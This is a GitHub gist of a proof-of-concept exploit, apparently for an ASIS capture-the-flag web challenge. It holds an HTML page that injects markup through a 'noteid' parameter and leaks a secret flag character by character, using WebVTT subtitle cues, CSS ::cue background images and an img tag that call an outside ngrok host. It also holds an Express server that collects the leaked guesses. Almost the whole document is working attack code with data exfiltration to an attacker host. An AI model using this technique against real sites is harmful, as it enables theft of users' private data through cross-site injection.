Skip to content

Instantly share code, notes, and snippets.

@parrot409

parrot409/rem.html Secret

Created December 26, 2021 11:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save parrot409/34194eb82b32e36d2a96d0bf3115a901 to your computer and use it in GitHub Desktop.
Save parrot409/34194eb82b32e36d2a96d0bf3115a901 to your computer and use it in GitHub Desktop.
Download ZIP
poc for classic
Raw
rem.html
<html>
<head>
<title>HAHA</title>
</head>
<body>
<script>
let x = window.open('http://localhost:8000','wof')
const alphabet = "abcdefghijklmnopqrstuvwxyz_"
let payload = `http://localhost:8000/report?noteid="><video id="video" controls autoplay muted><source src="http://639f-91-239-206-213.ngrok.io/video" type="video/mp4"><track label="English" kind="subtitles" srclang="en" src="%2Fsearch%3Fsearch%3DPAYLOAD%26msg%3DWEBVTT%250a00%3A00.000%2520--%3E%252000%3A04.000%250a%2520-%2520" default> </video><style>::cue {background-image:url('http://639f-91-239-206-213.ngrok.io/hit?wow=PAYLOAD')}</style><img src="http://639f-91-239-206-213.ngrok.io/hit?wow2=PAYLOAD">`
let leaked = "ASIS{i_thi"
i = 0
setInterval(()=>{
g = encodeURIComponent(leaked+alphabet[i++])
x.location = payload.replace(/PAYLOAD/g,g)
},1200)
</script>
</body>
</html>
Raw
rem.js
#!/usr/bin/env node
const express = require('express')
const app = express()
app.get('/video',(req,res)=>{
console.log("VIDEO")
res.setHeader('Cache-Control','max-age=904800')
res.sendFile('./test.mp4',{root:'.'})
})
app.get('/',(req,res)=>{
console.log("COME")
res.sendFile('./solve.html',{root:'.'})
})
app.get('/hit',(req,res)=>{
console.log(req.query.wow,req.query.wow2)
res.send("A")
})
app.listen(9001)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment